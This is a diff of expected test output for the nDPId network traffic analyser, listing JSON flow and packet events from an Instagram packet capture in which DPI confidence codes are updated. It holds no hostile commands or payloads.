+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1436720942530,"flow_last_seen":1436720942621,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":52289,"flow_avg_l4_payload_len":697,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58052,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720942580,"flow_last_seen":1436720942580,"flow_idle_time":7580000,"flow_min_l4_payload_len":255,"flow_max_l4_payload_len":255,"flow_tot_l4_payload_len":255,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":58053,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1436720908464,"flow_last_seen":1436720911139,"flow_idle_time":140000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"192.168.0.103","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1436720906017,"flow_last_seen":1436720906024,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":412,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1436720908581,"flow_last_seen":1436720908769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":8070,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.136","src_port":60908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":150,"flow_first_seen":1436720950909,"flow_last_seen":1436720952614,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":143658,"flow_avg_l4_payload_len":957,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 
00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":200000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -229,17 +228,17 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} 
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
